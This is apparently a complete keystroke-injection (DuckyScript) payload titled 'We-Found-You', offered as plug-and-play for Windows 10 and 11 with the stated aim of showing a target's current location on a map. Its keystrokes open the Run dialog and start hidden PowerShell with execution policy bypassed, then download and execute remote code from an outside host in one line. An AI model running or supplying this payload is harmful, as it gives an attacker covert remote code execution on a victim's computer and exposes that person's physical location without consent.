REM     Title: We-Found-You

REM     Author: I am Jakoby

REM     Description: This payload is meant to open a map in your target's web browser with their current location.

REM     Target: Windows 10, 11

REM     --------------------------------------------------------------------------------------
REM     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM     --------------------------------------------------------------------------------------

GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex
ENTER
